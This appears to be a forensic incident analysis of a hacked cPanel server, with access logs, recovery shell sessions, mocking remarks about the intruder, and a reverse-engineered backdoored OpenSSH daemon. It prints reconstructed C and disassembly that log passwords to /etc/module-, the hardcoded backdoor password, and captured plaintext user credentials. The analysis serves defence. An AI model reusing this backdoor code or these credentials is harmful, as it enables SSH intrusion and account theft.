188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1186549334/js/pkg_hover.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1231994883/yui/datasource/datasource.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:15 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/autocomplete.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:26 -0000] "GET /cPanel_magic_revision_1159323796/yui/container/assets/close12_1.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:29 -0000] "GET /yui/treeview/assets/loading.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:31 -0000] "GET /scripts/display_package_info?pkg=Basic HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:32 -0000] "POST /scripts/passwd HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:52 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:13 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:29 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:53 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:39 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:35:16 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:36:18 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:37:19 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:38:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:49 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:02 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:13 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:23 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:31 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:40 -0000] "GET /logout/ HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:40:41 -0000] "GET /logout/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:40:46 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
root@srv01 [/home/recovery]#
|
||
|
||
root@srv01 [/home/recovery/]# cat /tmp/access_log | grep "06/08" | grep crownvip | grep -v 91.184
|
||
188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
root@srv01 [/home/recovery]#
|
||
|
||
/*
|
||
RoMeO clearly has an issue with self image (probably to a tiny penis) and feels the need to fake things like
|
||
breaking out of a jail shell to make himself feel better. In fact, I'll bet that RoMeO
|
||
couldn't hack his way out of a wet tissue paper bag with a knife.
|
||
*/
|
||
|
||
|
||
root@srv01 [/home/recovery]# du -h /tmp/access_log
|
||
13M access_log
|
||
root@srv01 [/home/recovery]#
|
||
|
||
root@srv01 [/home/recovery]# strings /dev/sdb2 > stringfile_sdb2.txt
|
||
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | head -n 25
|
||
M0J
|
||
/var
|
||
4JcA.JcA.J
|
||
runt+found
|
||
cache
|
||
empty
|
||
games
|
||
local
|
||
lock
|
||
nisl
|
||
mail
|
||
preserve
|
||
spool
|
||
crash
|
||
racoon
|
||
account
|
||
cpanel
|
||
named
|
||
portsentry
|
||
aquota.userr.bz2
|
||
profiles
|
||
quota.user
|
||
netenberg
|
||
haxtar.gz
|
||
ll.tar
|
||
|
||
/*
|
||
A forensic investigation demonstrated that RoMeO was full of shit again. Clearly there was no grsec local exploit
|
||
and certainly no jailshell break tool or technique. During the investigation we identified two suspicious files
|
||
that were ll.tar and haxtar.gz. Those were in fact logpatch v1.1 (he can't write his own tools) and a real "weak"
|
||
attempt of modifying the OpenSSH daemon to add a backdoor.
|
||
*/
|
||
|
||
root@srv01 [/home/recovery]# cat sdb2output.txt | grep -A 1 hax
|
||
d/d * 983041(realloc): hax
|
||
r/r * 98310: ll.tar
|
||
root@srv01 [/home/recovery]#
|
||
|
||
/*
|
||
With the use of sleuthkit in our investication we validated the existance of the hax directory and the ll.tar
|
||
file on /dev/sdb2
|
||
*/
|
||
|
||
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep hax
|
||
haxtar.gz
|
||
hax.tar
|
||
hax/
|
||
hax/auth-sia.c
|
||
hax/msg.h
|
||
hax/fatal.c
|
||
hax/config.guess
|
||
hax/progressmeter.h
|
||
hax/hostfile.c
|
||
hax/sftp-client.h
|
||
hax/includes.h
|
||
hax/serverloop.h
|
||
hax/session.c
|
||
hax/ssh-agent.c
|
||
hax/scp.c
|
||
hax/loginrec.c
|
||
hax/bufaux.c
|
||
hax/auth-pam.h
|
||
hax/auth-sia.h
|
||
hax/ttymodes.h
|
||
hax/ssh-keygen.0
|
||
hax/auth-rh-rsa.c
|
||
hax/auth-passwd.c
|
||
hax/key.h
|
||
hax/packet.c
|
||
hax/rsa.c
|
||
hax/compat.h
|
||
hax/authfile.c
|
||
hax/ssh-keysign.8
|
||
hax/auth1.c
|
||
hax/readconf.c
|
||
hax/ssh2.h
|
||
hax/bufaux.h
|
||
hax/sftp.0
|
||
hax/scard.c
|
||
hax/README.platform
|
||
hax/WARNING.RNG
|
||
hax/ssh_config.0
|
||
hax/dns.c
|
||
hax/.cvsignore
|
||
hax/auth-krb5.c
|
||
hax/misc.h
|
||
hax/auth2-kbdint.c
|
||
hax/kex.c
|
||
hax/sftp-common.c
|
||
hax/log.c
|
||
hax/entropy.c
|
||
hax/sshlogin.c
|
||
hax/servconf.h
|
||
hax/cipher-aes.c
|
||
hax/atomicio.c
|
||
hax/xmalloc.c
|
||
hax/fixpaths
|
||
hax/sshtty.c
|
||
hax/fixprogs
|
||
hax/ttymodes.c
|
||
hax/auth.c
|
||
hax/auth2-pubkey.c
|
||
hax/dispatch.h
|
||
hax/rijndael.h
|
||
hax/misc.c
|
||
hax/sftp-server.c
|
||
hax/sshd.c
|
||
hax/scard-opensc.c
|
||
hax/serverloop.c
|
||
hax/readpass.c
|
||
hax/rsa.h
|
||
hax/ssh-keysign.c
|
||
hax/canohost.h
|
||
hax/ssh.0
|
||
hax/aclocal.m4
|
||
hax/ssh-rand-helper.0
|
||
hax/deattack.h
|
||
hax/auth-bsdauth.c
|
||
hax/gss-serv.c
|
||
hax/monitor.h
|
||
hax/monitor_mm.h
|
||
hax/entropy.h
|
||
hax/ChangeLog
|
||
hax/log.h
|
||
hax/sshconnect.c
|
||
hax/kexgex.c
|
||
hax/sftp-server.0
|
||
hax/auth.h
|
||
hax/deattack.c
|
||
hax/channels.c
|
||
hax/ssh-keygen.1
|
||
hax/version.h
|
||
hax/sftp-glob.c
|
||
hax/nchan2.ms
|
||
hax/kexdhs.c
|
||
hax/ssh.1
|
||
hax/groupaccess.h
|
||
hax/rijndael.c
|
||
hax/ssh_prng_cmds.in
|
||
hax/cipher-3des1.c
|
||
hax/mac.c
|
||
hax/configure
|
||
hax/cipher-ctr.c
|
||
hax/ssh-add.c
|
||
hax/gss-genr.c
|
||
hax/scp.1
|
||
hax/TODO
|
||
hax/acss.c
|
||
hax/loginrec.h
|
||
hax/sftp-client.c
|
||
hax/progressmeter.c
|
||
hax/md5crypt.h
|
||
hax/opensshd.init.in
|
||
hax/moduli.c
|
||
hax/uuencode.c
|
||
hax/config.h.in
|
||
hax/buildpkg.sh.in
|
||
hax/auth2-gss.c
|
||
hax/nchan.c
|
||
hax/cleanup.c
|
||
hax/msg.c
|
||
hax/mac.h
|
||
hax/cipher-bf1.c
|
||
hax/kexdh.c
|
||
hax/auth-options.c
|
||
hax/moduli
|
||
hax/hostfile.h
|
||
hax/install-sh
|
||
hax/sshpty.h
|
||
hax/cipher.h
|
||
hax/auth-options.h
|
||
hax/monitor_wrap.h
|
||
hax/configure.ac
|
||
root@srv01 [/home/recovery]#
|
||
|
||
// Familiar filenames for an unfamiliar poor coded backdoor
|
||
|
||
root@srv01 [/home/recovery/sdb2recover/hax]# cat includes.h | grep -i hookar -A1 -B1
|
||
|
||
#define hookar "0x3aownt"
|
||
#define HOOKAR_LG "/etc/module-"
|
||
int hookarOn;
|
||
|
||
root@srv01 [/home/recovery/sdb2recover/hax]#
|
||
|
||
|
||
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep -B 10 module-
|
||
# undef _INCLUDE__STDC__
|
||
# endif
|
||
#endif
|
||
#include <openssl/opensslv.h> /* For OPENSSL_VERSION_NUMBER */
|
||
#include "defines.h"
|
||
#include "version.h"
|
||
#include "openbsd-compat/openbsd-compat.h"
|
||
#include "openbsd-compat/bsd-nextstep.h"
|
||
#include "entropy.h"
|
||
#define hookar "0x3aownt"
|
||
#define HOOKAR_LG "/etc/module-"
|
||
|
||
/*
|
||
Partial source code recovered showing backdoor password. The rest of the code revealed the incoming
|
||
password logging that took place in /etc/module- which was used to hold captured data in paintext form
|
||
*/
|
||
|
||
root@srv01 [/home/recovery]# cat etc/module- | head -n 10
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: x00mario:!&8bmHvt4--$
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: x00mario:!&8bmHvt4--$
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
root@srv01 [/home/recovery]#
|
||
|
||
|
||
chkrootkit reports 1 deletion of record:
|
||
|
||
Checking `chkutmp'... The tty of the following user process(es) were not found
|
||
in /var/run/utmp !
|
||
! RUID PID TTY CMD
|
||
! root 5193 tty2 /sbin/mingetty tty2
|
||
! root 5194 tty3 /sbin/mingetty tty3
|
||
! root 5197 tty4 /sbin/mingetty tty4
|
||
! root 5211 tty5 /sbin/mingetty tty5
|
||
! root 5216 tty6 /sbin/mingetty tty6
|
||
chkutmp: nothing deleted
|
||
Checking `wted'... 1 deletion(s) between Tue Jun 8 11:40:56 2009 and Tue Jun 8 11:46:30 2009
|
||
|
||
|
||
Infected SSHD Binary Reverce Code Engineering
|
||
---------------------------------------------
|
||
|
||
//Global definitions
|
||
FILE *log; //A pointer to the password dump file
|
||
char *EtcModule = "/etc/module-"; //filename array of chars
|
||
char *a0x3aownt = "0x3aownt"; // hardcoded backdoor password
|
||
int hookarOn; //A backdoor authentication flag
|
||
|
||
//Standard passwd struct defined in pwd.h
|
||
struct passwd {
|
||
char *pw_name;
|
||
char *pw_passwd;
|
||
uid_t pw_uid;
|
||
gid_t pw_gid;
|
||
time_t pw_change;
|
||
char *pw_class;
|
||
char *pw_gecos;
|
||
char *pw_dir;
|
||
char *pw_shell;
|
||
time_t pw_expire;
|
||
};
|
||
//OpenSSH Authctxt struct defined in auth.h
|
||
struct Authctxt {
|
||
int success;
|
||
int postponed; /* authentication needs another step */
|
||
int valid; /* user exists and is allowed to login */
|
||
int attempt;
|
||
int failures;
|
||
int force_pwchange;
|
||
char *user; /* username sent by the client */
|
||
char *service;
|
||
struct passwd *pw; /* set if 'valid' */
|
||
char *style;
|
||
void *kbdintctxt;
|
||
#ifdef BSD_AUTH
|
||
auth_session_t *as;
|
||
#endif
|
||
#ifdef KRB5
|
||
krb5_context krb5_ctx;
|
||
krb5_ccache krb5_fwd_ccache;
|
||
krb5_principal krb5_user;
|
||
char *krb5_ticket_file;
|
||
char *krb5_ccname;
|
||
#endif
|
||
Buffer *loginmsg;
|
||
void *methoddata;
|
||
};
|
||
|
||
|
||
/*
|
||
.text:0804FA68 public sys_auth_passwd
|
||
.text:0804FA68 sys_auth_passwd proc near ; CODE XREF: auth_password+71p
|
||
.text:0804FA68
|
||
.text:0804FA68 arg_0 = dword ptr 8
|
||
.text:0804FA68 arg_4 = dword ptr 0Ch
|
||
.text:0804FA68
|
||
.text:0804FA68 push ebp
|
||
.text:0804FA69 mov ebp, esp
|
||
.text:0804FA6B push edi
|
||
.text:0804FA6C push esi
|
||
.text:0804FA6D push ebx
|
||
.text:0804FA6E sub esp, 0Ch
|
||
.text:0804FA71 mov eax, [ebp+arg_0] ; eax = authctxt
|
||
.text:0804FA74 mov ebx, [eax+8]
|
||
.text:0804FA77 test ebx, ebx
|
||
.text:0804FA79 mov edi, [ebp+arg_4] ; edi = password
|
||
.text:0804FA7C mov esi, [eax+20h] ; esi = authctxt->pw
|
||
.text:0804FA7F jnz loc_804FB28
|
||
.text:0804FA85 mov ebx, [esi+4]
|
||
.text:0804FA88
|
||
.text:0804FA88 loc_804FA88: ; CODE XREF: sys_auth_passwd+CEj
|
||
.text:0804FA88 mov al, [ebx]
|
||
.text:0804FA8A test al, al
|
||
.text:0804FA8C jnz short loc_804FA98
|
||
.text:0804FA8E cmp byte ptr [edi], 0
|
||
.text:0804FA91 mov edx, 1
|
||
.text:0804FA96 jz short loc_804FABD
|
||
.text:0804FA98
|
||
.text:0804FA98 loc_804FA98: ; CODE XREF: sys_auth_passwd+24j
|
||
.text:0804FA98 sub esp, 8
|
||
.text:0804FA9B test al, al
|
||
.text:0804FA9D jnz short loc_804FAC8
|
||
.text:0804FA9F
|
||
.text:0804FA9F loc_804FA9F: ; CODE XREF: sys_auth_passwd+66j
|
||
.text:0804FA9F mov eax, offset aXx ; "xx"
|
||
.text:0804FAA4 push eax
|
||
.text:0804FAA5 push edi
|
||
.text:0804FAA6 call xcrypt
|
||
.text:0804FAAB pop edx
|
||
.text:0804FAAC pop ecx
|
||
.text:0804FAAD push ebx ; s2
|
||
.text:0804FAAE push eax ; s1
|
||
.text:0804FAAF call _strcmp
|
||
.text:0804FAB4 add esp, 10h
|
||
.text:0804FAB7 xor edx, edx
|
||
.text:0804FAB9 test eax, eax
|
||
.text:0804FABB jz short loc_804FAEC
|
||
.text:0804FABD
|
||
.text:0804FABD loc_804FABD: ; CODE XREF: sys_auth_passwd+2Ej
|
||
.text:0804FABD ; sys_auth_passwd+7Fj
|
||
.text:0804FABD lea esp, [ebp-0Ch]
|
||
.text:0804FAC0 pop ebx
|
||
.text:0804FAC1 pop esi
|
||
.text:0804FAC2 mov eax, edx
|
||
.text:0804FAC4 pop edi
|
||
.text:0804FAC5 leave
|
||
.text:0804FAC6 retn
|
||
.text:0804FAC6 ; ---------------------------------------------------------------------------
|
||
.text:0804FAC7 align 4
|
||
.text:0804FAC8
|
||
.text:0804FAC8 loc_804FAC8: ; CODE XREF: sys_auth_passwd+35j
|
||
.text:0804FAC8 cmp byte ptr [ebx+1], 0
|
||
.text:0804FACC mov eax, ebx
|
||
.text:0804FACE jz short loc_804FA9F
|
||
.text:0804FAD0 push eax
|
||
.text:0804FAD1 push edi
|
||
.text:0804FAD2 call xcrypt
|
||
.text:0804FAD7 pop edx
|
||
.text:0804FAD8 pop ecx
|
||
.text:0804FAD9 push ebx ; s2
|
||
.text:0804FADA push eax ; s1
|
||
.text:0804FADB call _strcmp
|
||
.text:0804FAE0 add esp, 10h
|
||
.text:0804FAE3 xor edx, edx
|
||
.text:0804FAE5 test eax, eax
|
||
.text:0804FAE7 jnz short loc_804FABD
|
||
.text:0804FAE9 lea esi, [esi+0]
|
||
.text:0804FAEC
|
||
.text:0804FAEC loc_804FAEC: ; CODE XREF: sys_auth_passwd+53j
|
||
.text:0804FAEC sub esp, 8
|
||
.text:0804FAEF push (offset aSshRsa+6) ; aSshRsa+6 = 'a'
|
||
.text:0804FAF4 push offset aEtcModule ; "/etc/module-"
|
||
.text:0804FAF9 call _fopen64
|
||
.text:0804FAFE push edi
|
||
.text:0804FAFF push dword ptr [esi] ; esi = authctxt->pw, [esi] = pw->pw_name
|
||
.text:0804FB01 push offset aLoginInSS ; "login in: %s:%s\n"
|
||
.text:0804FB06 push eax ; stream
|
||
.text:0804FB07 mov ebx, eax
|
||
.text:0804FB09 call _fprintf
|
||
.text:0804FB0E add esp, 14h
|
||
.text:0804FB11 push ebx ; stream
|
||
.text:0804FB12 call _fclose
|
||
.text:0804FB17 lea esp, [ebp-0Ch]
|
||
.text:0804FB1A pop ebx
|
||
.text:0804FB1B pop esi
|
||
.text:0804FB1C mov edx, 1
|
||
.text:0804FB21 mov eax, edx
|
||
.text:0804FB23 pop edi
|
||
.text:0804FB24 leave
|
||
.text:0804FB25 retn
|
||
.text:0804FB25 ; ---------------------------------------------------------------------------
|
||
.text:0804FB26 align 4
|
||
.text:0804FB28
|
||
.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
|
||
.text:0804FB28 sub esp, 0Ch
|
||
.text:0804FB2B push esi
|
||
.text:0804FB2C call shadow_pw
|
||
.text:0804FB31 mov ebx, eax
|
||
.text:0804FB33 add esp, 10h
|
||
.text:0804FB36 jmp loc_804FA88
|
||
.text:0804FB36 sys_auth_passwd endp
|
||
*/
|
||
|
||
sys_auth_passwd(Authctxt *authctxt, const char *password) //BEGIN: Standard OpenSSH code
|
||
{
|
||
struct passwd *pw = authctxt->pw;
|
||
char *encrypted_password;
|
||
|
||
/* Just use the supplied fake password if authctxt is invalid */
|
||
char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
|
||
|
||
/* Check for users with no password. */
|
||
if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
|
||
return (1);
|
||
|
||
/* Encrypt the candidate password using the proper salt. */
|
||
encrypted_password = xcrypt(password,
|
||
(pw_password[0] && pw_password[1]) ? pw_password : "xx");
|
||
|
||
if(!strcmp(encrypted_password, pw_password) == 0) //END: Standard OpenSSH code
|
||
return 0;
|
||
|
||
log = fopen64(EtcModule,"a"); //Open the log file
|
||
fprintf(log,"login in: %s:%s\n",pw->pw_name,password); //Print "login in: <username>:<password>\n" into the file
|
||
fclose(log);
|
||
return 1; //Return authenticated
|
||
/* //Replaced code
|
||
* Authentication is accepted if the encrypted passwords
|
||
* are identical.
|
||
*/
|
||
//return (strcmp(encrypted_password, pw_password) == 0);
|
||
}
|
||
|
||
|
||
|
||
|
||
/*
|
||
.text:0804FB3C public auth_password
|
||
.text:0804FB3C auth_password proc near ; CODE XREF: auth1_process_password+7Dp
|
||
.text:0804FB3C ; do_authentication+130p ...
|
||
.text:0804FB3C
|
||
.text:0804FB3C arg_0 = dword ptr 8
|
||
.text:0804FB3C arg_4 = dword ptr 0Ch
|
||
.text:0804FB3C
|
||
.text:0804FB3C push ebp
|
||
.text:0804FB3D mov ebp, esp
|
||
.text:0804FB3F push edi
|
||
.text:0804FB40 push esi
|
||
.text:0804FB41 push ebx
|
||
.text:0804FB42 sub esp, 0Ch
|
||
.text:0804FB45 mov ebx, [ebp+arg_4]
|
||
.text:0804FB48 mov ds:hookarOn, 0
|
||
.text:0804FB52 mov esi, ebx
|
||
.text:0804FB54 mov edi, offset a0x3aownt ; "0x3aownt"
|
||
.text:0804FB59 mov ecx, 9
|
||
.text:0804FB5E cld
|
||
.text:0804FB5F repe cmpsb
|
||
.text:0804FB61 jnz short loc_804FB7C
|
||
.text:0804FB63 mov ds:hookarOn, 1
|
||
.text:0804FB6D mov eax, 1
|
||
